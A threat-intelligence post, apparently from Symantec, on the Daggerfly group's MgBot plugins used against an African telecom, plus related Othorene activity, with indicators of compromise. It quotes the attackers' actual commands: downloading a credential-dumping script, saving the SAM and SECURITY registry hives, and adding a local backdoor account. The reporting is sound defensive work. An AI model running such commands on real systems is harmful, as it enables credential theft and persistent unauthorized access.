A telecommunications organization in Africa appears to be among the latest targets for the Daggerfly (aka Evasive Panda, Bronze Highland) advanced persistent threat (APT) group, with the group’s most recent campaign using previously unseen plugins from the MgBot malware framework.
The first indications of malicious activity on this victim’s network were seen in November 2022, but there are indications the activity is likely still ongoing. Researchers from the Threat Hunter Team at Symantec, by Broadcom Software, found multiple unique plugins associated with the MgBot modular malware framework on the victim’s network. The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software. Use of the MgBot modular malware framework and PlugX loader have been associated in the past with China-linked APTs.
Association between this activity and Daggerfly is based in part on details in a 2020 blog about activity that Malwarebytes attributed to Evasive Panda. Crossovers in the activity included:
- One of the MgBot samples found appears in both sets of activity
- Both sets of activity include a renamed Rundll32.exe file named "dbengin.exe" in the ProgramData\Microsoft\PlayReady directory
- The loader DLL "pMsrvd.dll" in the csidl_common_appdata\microsoft\playready\mdie942.tmp directory appears in both sets of activity
The folders and file names used in this recent activity, as well as the use of DLL side-loading, also support the attribution. The activity documented by Malwarebytes occurred in 2020, and Daggerfly is believed to have been active since at least 2014.
Suspicious AnyDesk connections spotted on a Microsoft Exchange mail server in November 2022 were among the first signs of suspicious activity on the victim network targeted in this recent Daggerfly activity. AnyDesk is a legitimate remote desktop software but it is commonly abused by threat actors for remote access and other purposes.
The WannaMine crypto-mining malware was also seen on the same Exchange server, though it appears likely that this activity was not linked to the Daggerfly group. The presence of WannaMine, however, does indicate that the server it was found on may have been unpatched and vulnerable to the EternalBlue exploit, as well as more recent exploits targeting this web server.
The legitimate, free Rising antivirus software was also used to side-load the PlugX loader onto victim machines.
We will go through the attack chain in further detail below.
Threat actors used the living-off-the-land tools BITSAdmin and PowerShell to download files onto victim systems. The attackers downloaded the legitimate AnyDesk executable and the GetCredManCreds tool in this way.
bitsadmin /transfer d7d3 https://download.anydesk.com/AnyDesk.exe CSIDL_COMMON_APPDATA\anydesk.exe
“CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://download.anydesk.com/AnyDesk.exe -OutFile CSIDL_COMMON_APPDATA\anydesk.exe
The attackers used the previously downloaded GetCredManCreds script to retrieve the usernames and passwords of web services stored in the credential manager using PowerShell.
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://raw.githubusercontent.com/VimalShekar/PowerShell/master/GetCredmanCreds.ps1 -OutFile CSIDL_COMMON_APPDATA\a.ps1
They also dumped the SAM (Security Account Manager), System, and Security hives of the Windows registry using the reg.exe tool. This allowed the adversaries to extract credentials from the SAM database.
"CSIDL_SYSTEM\reg.exe" save hklm\sam sam.save
"CSIDL_SYSTEM\reg.exe" save hklm\system system.save
"CSIDL_SYSTEM\reg.exe" save hklm\security security.save
Persistence with local account
Daggerfly also created a local account to maintain access to victim systems with the following command line:
"CSIDL_SYSTEM\net.exe" user [REDACTED] Pqssword1 /add
MgBot modular malware framework
MgBot is a well-designed modular framework that is actively maintained. The components of the framework are the following:
- MgBot EXE dropper
- MgBot DLL Loader
- MgBot Plugins
The MgBot plugins that were deployed in this activity have numerous capabilities that can provide the attackers with a significant amount of information about compromised machines. Among the unique plugins that were deployed during this activity were:
- Network scanner – innocence.dll
- Capabilities include: arp scan, http scan, determining the type of server (e.g. SQL, WebLogic, Redis, etc.) it is running on.
- A Chrome and Firefox infostealer that can gather information such as bookmarks and browsing history – bkmk.dll
- Logging module – famdowm.dll
- Based on the open-source easylogging++, which can carry out basic logging, track performance and more.
- QQ messages infostealer – qmsdp.dll
- Based on this blog, which details how a chat tool message database was cracked by hackers.
- Active Directory enumeration – ceeeb.dll
- Collects the following information from Active directory:
- Members info
- Local Admins
- Remote Desktop Users
- Dcom Users
- Collects the following information from Active directory:
- Password dumper – cpfwplgx.dll
- Drops a file to call the MiniDumpWriteDump API to dump a process memory.
- QQ Keylogger – kstrcs.dll
- Keylogger that targets QQEdit.exe and QQ.exe processes.
- Screen and clipboard grabber – cbmrpa.dll
- Captures clipboard and drag and drop data and saves it to a file.
- Outlook and Foxmail credentials stealer – maillfpassword.dll
- Audio capture – prsm.dll
- Captures audio from the infected system.
- Uses COM objects IMMDeviceEnumerator, IAudioCaptureClient.
- Process Watchdog – ansecprocesskeep.dll
- Registered as service AnsecProcessKeep.
- Confirmed to be a watchdog that keeps a process running.
- The process name is found in an .ini file.
All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines. The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering.
Daggerfly’s development of these previously unseen plugins demonstrates that the attack group is continuing to actively develop its malware and the tools it can use to target victim networks.
Continuation of a Trend
Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users.
Symantec’s Threat Hunter team also spotted some other recent activity targeting telecoms companies that was linked with moderate confidence to the threat actor Othorene (aka Gallium), in what appeared to be a continuation of an intelligence-gathering campaign first reported on by SentinelOne under the name Operation Tainted Love in March. SentinelOne reported that in that campaign Othorene was targeting telecoms companies in the Middle East.
Othorene has been active since around 2014, and it is believed to be a relatively small group that has a strong focus on the surveillance of individuals. There are some indications that Othorene may have links with the APT41 (aka Blackfly, Grayfly) APT group also. Overlap of both personnel and tactics, techniques, and procedures (TTPs) among Chinese APT groups is not uncommon, and can mean that attributing activity to one group with high confidence is difficult.
In the activity Symantec saw, we found three additional victims of the same campaign that SentinelOne detailed, located in Asia and Africa. Two of the three were subsidiaries of the same Middle Eastern telecoms firm. The attackers had been active on victim networks since November 2022. Symantec saw attackers dumping credentials and scanning the network using NbtScan.
The main malware (pc.exe dubbed mim221) in this campaign was used to dump credentials, and it had the same password as the malware used in the activity documented by SentinelOne. The attackers also moved laterally across victims’ networks, used Scheduled Task for persistence, and dumped SAM and System hives from the registry. There were indications that the attackers may have exported the Active Directory database on victim machines, and they were also able to gain access to domain controllers, giving them deep access to victim networks.
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
File Indicators – Daggerfly
MgBot – aasrvd.dll, pmsrvd.dll
PlugX Loader – proccom.dll, djcu.dll
DumpCredStore – dumpcredstore.ps1, a.ps1
AnyDesk – anydesk.exe
File Indicators – Othorene
3f75818e2e43a744980254bfdc1225e7743689b378081c560e824a36e0e0a195 – pc.exe, rpc.exe (Main malware)
1b8500e27edc87464b8e5786dc8c2beed9a8c6e58b82e50280cebb7f233bcde4 – get.exe (used to print Syskey and Samkey)
03bc62bd9a681bdcb85db33a08b6f2b41f853de84aa237ae7216432a6f8f817e – pc.dll
ae39ced76c78e7c2043b813718e3cd610e1a8adac1f9ad5e69cf06bd6e38a5bd – pc.dll
f6f6152db941a03e1f45d52ab55a2e3d774015ccb8828533654e3f3161cfcd21 – pc.exe
2f4a97dc70f06e0235796fec6393579999c224e144adcff908e0c681c123a8a2 – pc.dll
22069984cba22be84fe33a886d989b683de6eb09f001670dbd8c1b605460d454 – pc.dll
7b945fb1bdeb27a35fab7c2e0f5f45e0e64df7821dd1417a77922c9b08acfdc3 – rpc.dll
e8be3e40f79981a1c29c15992da116ea969ab5a15dc514479871a50b20b10158 – pc.dl
b5c46c2604e29e24c6eb373a7287d919da5c18c04572021f20b8e1966b86d585 – rpc.dll
53d2506723f4d69afca33e90142833b132ed11dd0766192a087cb206840f3692 – test.exe
26d129aaa4f0f830a7a20fe6317ee4a254b9caac52730b6fed6c482be4a5c79d – g.dll
b45355c8b84b57ae015ad0aebfa8707be3f33e12731f7f8c282c8ee51f962292 – g.dll
17dce65529069529bcb5ced04721d641bf6d7a7ac61d43aaf1bca2f6e08ead56 – getHashFlsa64.dll
98b6992749819d0a34a196768c6c0d43b100ef754194308eae6aaa90352e2c13 – getHashFlsa64.dll
6d5be3e6939a7c86280044eebe71c566b48981a3341193aa3aff634a3a5d1bbd – getHashFlsa64.dll
1cf04c3e8349171d907b911bc2a23bdb544d88e2f9b8fcc516d8bcf68168aede – getHashFlsa64.dll
We encourage you to share your thoughts on your favorite social platform.